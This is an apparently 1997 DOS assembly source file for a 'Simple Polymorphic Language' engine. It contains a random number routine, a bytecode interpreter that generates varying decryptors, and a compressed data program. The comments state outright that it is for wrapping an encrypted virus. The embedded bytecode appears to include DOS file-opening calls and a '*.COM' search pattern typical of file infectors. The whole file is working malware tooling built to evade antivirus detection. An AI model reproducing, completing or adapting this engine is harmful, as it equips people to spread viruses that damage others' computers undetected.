;SIMPLE POLYMORfIC LANGUAGE Version 1.0
;(c)1997 by ANAX
;
;This file contain two fuctions which you must include in your
;source file.
;





;------------------------------------------------------
;Fuction <splrand>
;The random number generator.
;You must call this fuction before <sple>.
;Input:
;DS= Segment adress of a reserved memory block.
;    The block must be at least 497 bytes long
;Output:
;splrand sets all variables to random values.
;Registers and Flags are not effected.
;
;------------------------------------------------------
splrand PROC NEAR 
        PUSHF 
        PUSH AX 
        PUSH BX 
        XOR BX,BX 
splrandloop: 
        IN AL,040h 
        ADD AL,[BX-1] 
        XOR DS:[BX],AL 
        INC BX 
        CMP BX,256 
        JNZ splrandloop 
        POP BX 
        POP AX 
        POPF 
        RET 
splrand ENDP 
;------------------------------------------------------





;------------------------------------------------------
;Fuction <sple> 
;The SPL Engine. 
;Input: 
;DS= Segment adress of a reserved memory block. 
;    The block must be at least 497 bytes long. 
;    This memory block, must first be initialized 
;    with <splrand> fuction. 
;ES= Segment adress of the second memory block. 
;    Its the buffer where your SPL program will put 
;    the decryptor and possible you would also like 
;    to put there the encrypted image of your virus.
;    So, the size of this buffer depents on you.
;Output:
;Registers and Flags are not effected.
;
;------------------------------------------------------
sple    PROC NEAR   
;Save registers AX,BX,CX,DX,SI,DI  
        PUSHF 
        PUSH AX 
        PUSH BX 
        PUSH CX 
        PUSH DX 
        PUSH SI 
        PUSH DI 
;decompress spldata[] into DS:100  
        PUSH ES  
        PUSH DS  
        PUSH DS  
        POP ES  
        PUSH CS   
        POP DS   
        MOV CX,240 
        Call $+3  
splDelta:POP SI 
        SUB SI,offset splDelta   
        ADD SI,offset spldata 
        MOV DI,256 
        MOV DL,DS:[SI] 
        INC SI   
spldec0:MOV AX,DS:[SI] 
        INC SI   
        CMP AL,DL    
        JNZ spldec1   
        INC SI   
        CMP AH,0FFh 
        JZ spldec1   
        MOV AL,AH  
        MOV AH,0     
        SUB CX,AX    
        PUSH CX    
        MOV CX,AX    
        MOV AX,DS:[SI]  
        INC SI    
        INC SI    
        PUSH SI    
        MOV SI,DI    
        SUB SI,AX    
spldec2:MOV AL,ES:[SI]    
        INC SI    
        MOV ES:[DI],AL    
        INC DI    
        LOOP spldec2   
        POP SI   
        POP CX   
        CMP CX,0   
        JZ spldec3   
        JMP spldec0   
spldec1:MOV ES:[DI],AL  
        INC DI    
        LOOP spldec0    
spldec3:POP DS    
        POP ES    
;initialize registers and call the interpreter 
        MOV SI,256 
        MOV WORD PTR DS:[1],0 ; SPL_BUFFER_PTR STARTING VALUE 
        CALL spltranslateinstr 
;Restore AX,BX,CX,DX,SI.DI 
        POP DI 
        POP SI 
        POP DX 
        POP CX 
        POP BX 
        POP AX 
        POPF 
        RET  ;exit   
spltranslateinstr: 
        XOR BX,BX 
        IN AL,40h 
        MOV DS:[0],AL 
        PUSH SI 
        MOV AL,DS:[SI] 
spl2:   CMP AL,255  
        JNZ spl3  
        INC SI 
splinstr2:         
        call spltranslateinstr 
        CALL splgetinstrsize 
        ADD SI,AX 
        JMP splinstr2 
spl3:   CMP AL,254 
        JNZ spl4  
        INC SI  
spl3again:MOV AL,DS:[SI] 
        CMP AL,232 
        JZ spl3next 
        CMP AL,251 
        JZ spl3next 
spl3exec:call spltranslateinstr 
        POP SI   
        RET    
spl3next:CALL splgetinstrsize 
        ADD SI,AX 
        JMP spl3again 
spl4:   CMP AL,252 
        JNZ spl5  
        mov al,ds:[si+1] 
        xlat 
spl4again:POP si 
        PUSH SI
        ADD SI,2
        XOR BL,BL 
spl4next:cmp byte ptr ds:[SI],250 
        jz spl4DIV 
        cmp AL,BL 
        jz spl4end 
        INC BL 
        PUSH AX 
        call splgetinstrsize 
        add SI,AX 
        POP AX 
        JMP spl4next 
spl4div:XOR AH,AH 
		 DIV BL  
        MOV AL,AH 
        JMP spl4again 
spl4end:         
        call spltranslateinstr 
        POP SI 
        PUSH SI 
        JMP splnopping 
spl5:   CMP AL,253 
        JNZ spl6  
spl5again:IN AL,40h 
spl5again2:POP si 
        PUSH SI
        ADD SI,1
        XOR BL,BL 
spl5next: 
        cmp byte ptr ds:[SI],250 
        jz spl5div 
        cmp byte ptr ds:[SI],232 
        jz spl5pass 
        cmp byte ptr ds:[SI],251 
        jz spl5pass 
        CMP AL,BL  
        JZ spl5exec 
        INC BL 
spl5pass:PUSH AX 
        call splgetinstrsize 
        add SI,AX 
        POP AX 
        JMP spl5next 
spl5div:TEST BL,BL 
        JZ spl5exec 
           
        XOR AH,AH 
		 DIV BL  
        MOV AL,AH 
        JMP spl5again2 
spl5exec:call spltranslateinstr 
        JMP spl5again 
spl6:   CMP AL,232 
        JNZ spl7  
        POP SI 
        RET 
spl7:   CMP AL,251 
        JNZ spl8  
        POP SI 
        RET 
spl8:   CMP AL,250 
        JNZ spl9  
        POP SI 
        POP SI 
        POP SI 
        PUSH SI 
        JMP splnopping 
spl9:   CMP AL,247
        JNZ spl10  
        MOV AL,DS:[SI+2]  
        JMP spl10c    
spl10:  CMP AL,246
        JNZ spl11  
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl10c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        MOV DS:[DI],AL    
        JMP splnopping    
spl11:  CMP AL,241
        JNZ spl12  
        MOV AL,DS:[SI+2]  
        JMP spl12c    
spl12:  CMP AL,240
        JNZ spl13 
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl12c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        ADD DS:[DI],AL    
        MOV AL,0     
        ADC AL,0     
        MOV DS:[3],AL   
        JMP splnopping    
spl13:  CMP AL,235
        JNZ spl14  
        MOV AL,DS:[SI+2]  
        JMP spl14c    
spl14:  CMP AL,234
        JNZ spl15 
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl14c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        SUB DS:[DI],AL    
        MOV AL,0     
        ADC AL,0     
        MOV DS:[3],AL   
        JMP splnopping    
spl15:  CMP AL,239
        JNZ spl16  
        MOV AL,DS:[SI+2]  
        JMP spl16c    
spl16:  CMP AL,238
        JNZ spl17 
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl16c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        XOR DS:[DI],AL    
        JMP splnopping    
spl17:  CMP AL,243
        JNZ spl18  
        MOV AL,DS:[SI+2]  
        JMP spl18c    
spl18:  CMP AL,242
        JNZ spl19 
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl18c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        AND DS:[DI],AL    
        JMP splnopping    
spl19:  CMP AL,245
        JNZ spl20  
        MOV AL,DS:[SI+2]  
        JMP spl20c    
spl20:  CMP AL,244
        JNZ spl23 
        MOV DI,DS:[SI+2]  
        AND DI,00FFh   
        MOV AL,DS:[DI]  
spl20c: MOV DI,DS:[SI+1]  
        AND DI,00FFh      
        OR DS:[DI],AL    
        JMP splnopping    
spl23:  CMP AL,248
        JNZ spl24  
        MOV AL,DS:[SI+1]  
        XLAT 
        JMP spl25 
spl24:  CMP AL,249 
        JNZ spl25  
        MOV AL,DS:[SI+1]  
spl25:  MOV DI,DS:[1] 
        MOV ES:[DI],AL 
        INC WORD PTR DS:[1] 
        JMP splnopping 
splnopping: 
        CALL splgetinstrsize 
        CMP AL,1 
        JZ splonenop 
        MOV BYTE PTR DS:[SI],251 
        ADD SI,AX  
        DEC SI 
        MOV BYTE PTR DS:[SI],250 
        JMP splreturning 
splonenop: 
        MOV BYTE PTR DS:[SI],232 
splreturning: 
        POP SI 
        RET 
splgetinstrsize:  
        MOV AL,DS:[SI]   
        CMP AL,250		 
        JB splget2  
        PUSH SI 
        CMP AL,252  
        JNZ splget4 
        INC SI      
splget4:INC SI         
splget5:CMP byte ptr DS:[SI],250 
        JNZ splget3	   
        MOV AX,SI	 
        POP SI	  
        SUB AX,SI 
        INC AX	 
        RET		 
splget3:call splgetinstrsize 
        ADD SI,AX    
        JMP splget5  
splget2:      
       CMP AL,248  
       JNC splget6 
       CMP AL,234   
       JNC splthreebytes   
splget6:        
       CMP AL,249   
       JZ spltwobytes   
       CMP AL,248   
       JZ spltwobytes   
splonebyte:   
        MOV AX,1 
        RET   
spltwobytes:  
        MOV AX,2 
        RET   
splthreebytes: 
        MOV AX,3 
        RET 
sple   ENDP   
;------------------------------------------------------




;------------------------------------------------------
;This virtually is your SPL program. 
;<sple> fuction decompress and execute those data. 
;------------------------------------------------------
spldata DB 003,255,247,001,000,247,002,001,252,000,180,255,184,248,000,250
        DB 250,078,246,005,001,252,000,186,255,141,022,250,250,246,007,001
        DB 246,008,002,000,000,205,033,114,246,011,001,246,012,002,000,184
        DB 002,061,186,158,000,205,033,252,000,183,255,187,248,000,250,250
        DB 064,253,254,252,004,080,083,147,250,252,004,083,080,232,250,252
        DB 004,088,091,232,250,252,004,091,088,232,250,250,255,186,000,001
        DB 250,255,185,248,000,001,250,250,205,033,003,009,098,000,079,246
        DB 006,005,234,006,001,235,006,002,249,235,248,006,253,252,000,255
        DB 102,105,114,115,116,032,250,255,115,101,099,111,110,100,032,250
        DB 255,116,114,105,116,111,032,250,250,255,246,009,001,246,010,002
        DB 246,001,007,246,002,008,248,009,248,010,246,001,009,246,002,010
        DB 042,046,252,000,067,099,250,252,000,079,111,250,252,000,077,109
        DB 250,000,250,255,246,013,001,246,014,002,246,001,011,246,002,012
        DB 246,006,013,234,006,011,235,006,001,248,006,246,001,013,246,002
        DB 014,252,000,255,205,032,250,195,250,250,250,250,
